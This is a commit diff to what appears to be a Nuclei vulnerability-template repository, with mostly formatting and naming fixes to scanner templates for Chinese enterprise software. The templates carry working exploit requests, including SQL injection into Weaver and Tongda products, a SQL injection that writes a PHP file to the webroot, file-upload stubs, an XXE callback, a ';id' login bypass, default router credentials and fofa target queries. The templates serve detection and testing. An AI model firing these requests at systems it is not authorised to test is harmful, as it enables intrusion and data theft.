updated templates

2023-09-17 21:41:07 +05:30 · 2023-09-17 21:41:07 +05:30 · b96825a291
parent 274c14e763
commit b96825a291
35 changed files with 94 additions and 267 deletions
--- a/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
+++ b/http/cnvd/2021/CNVD-2021-30167.yaml.yaml
@ -1,79 +0,0 @@
 id: yonyou-nc-bshservlet-full-check
 info:
  name: yonyou-nc-bshservlet-full-check
  author: SleepingBag945
  severity: critical
  description: 测试所有BshServlet RCE端点
  reference:
    - https://github.com/parkourhe/yongYouNC-RCE/blob/master/poc.txt
  tags: yonyou,nc
 http:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/~aim/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~alm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ampub/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~arap/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~aum/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~cc/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~cdm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~cmp/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ct/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~dm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~erm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fa/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fac/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fbm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ff/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fip/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fipub/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fp/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fts/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~fvm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~gl/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrhi/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrjf/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrpd/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrpub/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrtrn/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~hrwa/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ia/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~ic/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~iufo/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~modules/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~mpp/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~obm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~pu/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~qc/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~sc/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~scmpub/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so2/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so3/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so4/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so5/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~so6/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~tam/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~tbb/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~to/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uap/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapbd/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapde/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapeai/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapother/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapqe/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapweb/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~uapws/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~vrm/bsh.servlet.BshServlet"
      - "{{BaseURL}}/servlet/~yer/bsh.servlet.BshServlet"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "BeanShell Test Servlet"
      - type: status
        status:
          - 200
--- a/http/cnvd/2022/CNVD-2022-43245.yaml
+++ b/http/cnvd/2022/CNVD-2022-43245.yaml
@ -28,12 +28,12 @@ http:
    matchers:
      - type: word
        part: body
-        words :
+        words:
          - "<methodResponse><params><param><value><base64>"
      - type: word
        part: header
-        words :
+        words:
          - "text/xml"
      - type: status
--- a/http/cnvd/2023/CNVD-C-2023-76801.yaml
+++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml
@ -17,7 +17,7 @@ http:
        {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
        "parameterTypes":["java.lang.Object","java.lang.String"],
        "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
-      
+
      - |
        GET /{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}
--- a/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml
+++ b/http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml
@ -1,14 +1,14 @@
 id: tp-link-tl-r470gp-ac-default-login
 info:
-  name: TP-LINK TL-R470GP-AC Default weak password
+  name: TP-LINK TL-R470GP-AC - Default Login
  author: SleepingBag945
  severity: high
  description: |
    TP-LINK TL-R470GP-AC 默认口令123456
  metadata:
    fofa-query: title="TL-R470GP-AC"
-  tags: tp-link,default-login,ac
+  tags: tp-link,default-login,router
 http:
  - raw:
@ -17,18 +17,13 @@ http:
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Connection: close
        {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"stok\""
          - "\"error_code\":0"
-        condition: and
+        condition: and
--- a/http/vulnerabilities/other/consul-rexec-rce.yaml
+++ b/http/vulnerabilities/other/consul-rexec-rce.yaml
@ -1,34 +0,0 @@
 id: consul-rexec-rce
 info:
  name: Consul Rexec RCE
  author: SleepingBag945
  severity: critical
  description: |
    Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
  metadata:
    fofa-query: protocol="consul(http)"
  tags: rce
 http:
  - raw:
      - |
        GET /v1/agent/self  HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"EnableRemoteScriptChecks":true'
        condition: and
      - type: status
        status:
          - 200
 # msf
 # search Hashicorp
 # exploit/multi/misc/consul_service_exec
--- a/http/vulnerabilities/other/consul-service-rce.yaml
+++ b/http/vulnerabilities/other/consul-service-rce.yaml
@ -1,35 +0,0 @@
 id: consul-service-rce
 info:
  name: consul-service-rce
  author: SleepingBag945
  severity: critical
  description: |
    Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
  metadata:
    fofa-query: protocol="consul(http)"
  tags: rce
 http:
  - raw:
      - |
        GET /v1/agent/self  HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "\"EnableScriptChecks\": true"
          - "\"EnableRemoteScriptChecks\": true"
        condition: or
      - type: status
        status:
          - 200
 # msf
 # search Hashicorp
 # exploit/multi/misc/consul_service_exec
--- a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
+++ b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
@ -2,7 +2,7 @@ id: secsslvpn-auth-bypass
 info:
  name:  Secure Access Gateway SecSSLVPN - Authentication Bypass
-  author: SleepingBag945  
+  author: SleepingBag945
  severity: high
  description: |
    The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.
--- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
@ -1,5 +1,4 @@
 id: ruijie-nbr-fileupload
 info:
  name: Ruijie NBR fileupload.php - Arbitrary File Upload
  author: SleepingBag945
@ -28,7 +27,7 @@ http:
        Content-Type: image/jpeg
        <?php echo "{{string}}"; unlink(__FILE__); ?>
-      
+
      - |
        GET /ddi/server/upload/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}
--- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
+++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
@ -57,7 +57,7 @@ http:
    matchers-condition: and
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - status_code_2 == 200
          - contains(body_2,'{{file-upload}}')
          - contains(header_2,'text/html')
--- a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
+++ b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
@ -27,11 +27,11 @@ http:
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
        Accept-Encoding: gzip
-        
+
        --59229605f98b8cf290a7b8908b34616b
        Content-Disposition: form-data; name="upload"; filename="{{filename}}.xls"
        Content-Type: application/vnd.ms-excel
-        
+
        <% out.println("{{string}}");%>
        --59229605f98b8cf290a7b8908b34616b--
--- a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
+++ b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml
@ -1,7 +1,7 @@
 id: smartbi-deserialization
 info:
-  name: Smartbi windowunloading Interface - Deserialization 
+  name: Smartbi windowunloading Interface - Deserialization
  author: SleepingBag945
  severity: high
  description: |
--- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
+++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
@ -13,7 +13,7 @@ info:
    max-request: 1
    verified: true
    fofa-query: app="TDXK-通达OA"
-  tags: tongda,fileupload,intrusive
+  tags: tongda,fileupload,intrusive,router
 variables:
  num: "999999999"
@ -59,6 +59,7 @@ http:
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(num)}}'
--- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
+++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml
@ -23,15 +23,24 @@ http:
        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
      - |
        POST /general/document/index.php/recv/register/insert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
    matchers-condition: and
    matchers:
      - type: word
-        part: header
+        part: header_1
        words:
          - "PHPSESSID="
          - "register_for/?rid="
        condition: and
-      - type: status
+      - type: word
-        status:
+        part: header_2
-          - 302
+        words:
          - "register_for/?rid="
        negative: true
--- a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
+++ b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
@ -1,36 +0,0 @@
 id: topsec-topapplb-arbitrary-login
 info:
  name: Topsec TopAppLB Any account Login - Arbitrary Login
  author: SleepingBag945
  severity: high
  description: |
    Any Account can log in to the background.Enter any account on the login page, the password is ;id
  reference:
    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json  
  metadata:
    max-request: 1
    fofa-query: title="TopApp-LB 负载均衡系统"
  tags: topsec,topapplb,misconfig
 http:
  - raw:
      - |
        POST /login_check.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        userName=admin&password=%3Bid
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 302 && contains(header_1,"redirect.php")'
        condition: and
--- a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
+++ b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
@ -7,7 +7,7 @@ info:
  description: |
    Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
  reference:
-    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json  
+    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
  metadata:
    max-request: 1
    verified: true
@ -24,7 +24,7 @@ http:
        userName=admin&password=%3Bid
      - |
-        GET /  HTTP/1.1
+        GET / HTTP/1.1
        Host: {{Hostname}}
    cookie-reuse: true
--- a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml
+++ b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml
@ -23,7 +23,7 @@ http:
        <?xml version="1.0" encoding="UTF-8" ?>
        <!DOCTYPE ANY [
-        <!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>        
+        <!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
        <value>&xxe;</value>
    matchers-condition: and
--- a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml
@ -1,15 +1,15 @@
-id: weaver-e-cology-verifyquicklogin-arbitrary-login
+id: ecology-verifyquicklogin-auth-bypass
 info:
-  name: weaver e-cology verifyquicklogin.jsp arbitrarylogin
+  name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
  author: SleepingBag945
  severity: high
-  description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞，攻击者通过发送特殊的请求包可以获取管理员Session
+  description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
  metadata:
    fofa-query: app="泛微-协同办公OA"
-  tags: ecology,weaver,oa
+  tags: ecology,weaver,oa,auth-bypass
 http:
  - raw:
@ -23,19 +23,18 @@ http:
        identifier=1&language=1&ipaddress=x.x.x.x
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"sessionkey\":"
      - type: word
        part: body
        words:
          - "\"message\":"
      - type: status
        status:
-          - 200
+          - 200
 # Enhanced by md on 2022/10/31
--- a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
@ -1,34 +1,34 @@
 id: weaver-e-cology-validate-sqli
 info:
-  name: weaver-e-cology-validate-sqli
+  name: Weaver e-cology Validate.JSP - SQL Injection
  author: SleepingBag945
  severity: high
-  description: 泛微e-cology OA系统的validate.jsp文件中，因为对参数capitalid过滤不严，可致使SQL注入漏洞。攻击者运用该漏洞，可在未授权的情况下，远程发送精心构造的SQL语句，从而取得数据库敏感信息。
+  description: |
-  tags: ecology,weaver,oa,sqli
+    In the validate.jsp file of the Panwei e-cology OA system, the parameter capitalid is not strictly filtered, which can lead to SQL injection vulnerabilities. An attacker can use this vulnerability to remotely send carefully constructed SQL statements without authorization, thereby obtaining sensitive database information.
  tags: ecology,weaver,sqli
 variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"
 http:
  - raw:
      - |
        POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
-        sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10
+        sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{num1}}*{{num2}})&capitalnum=-10
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
-          - "8370114"
+          - "{{result}}"
      - type: status
        status:
-          - 200
+          - 200
 # Enhanced by md on 2022/10/31
 # select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录
--- a/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
+++ b/http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
@ -39,7 +39,15 @@ http:
    matchers-condition: and
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - status_code == 200
          - contains(body,'Windows IP Configuration')
        condition: and
      - type: word
        part: header
        words:
          - "application/json"
          - "text/html"
        negative: true
        condition: and
--- a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
@ -35,7 +35,7 @@ http:
    skip-variables-check: true
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
          - "status_code_2 == 200 && contains(header_2, 'filename=')"
          - "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"
--- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@ -21,8 +21,8 @@ variables:
 http:
  - method: GET
    path:
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+  #    - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
    stop-at-first-match: true
    matchers:
--- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
@ -17,7 +17,7 @@ info:
 variables:
  filename: "{{to_lower(rand_base(5))}}"
-  payload: "[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
+  payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(weaver);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
 http:
  - raw:
@ -35,9 +35,7 @@ http:
      - type: word
        part: body_2
        words:
-          - "PHP Version"
+          - "758058d8987e7a9ec723bcdbec6c407e"
          - "PHP Extension"
        condition: and
      - type: status
        status:
--- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
@ -51,7 +51,7 @@ http:
    matchers-condition: and
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - "status_code_1 == 200"
          - "status_code_3 == 200 && contains(body_3,'{{string}}')"
-        condition: and
+        condition: and
--- a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
@ -43,7 +43,7 @@ http:
    matchers-condition: and
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
          - "contains(body_2, '{{result}}') && status_code_2 == 200"
        condition: and
--- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
@ -10,7 +10,7 @@ info:
    max-request: 1
    fofa-query: app="泛微-EOffice"
    verified: true
-  tags: weaver,e-office,oa,instrusive,rce
+  tags: weaver,e-office,intrusive,rce,file-upload
 variables:
  filename: "{{to_lower(rand_base(5))}}"
@ -59,7 +59,7 @@ http:
    matchers-condition: and
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - "status_code_1 == 200"
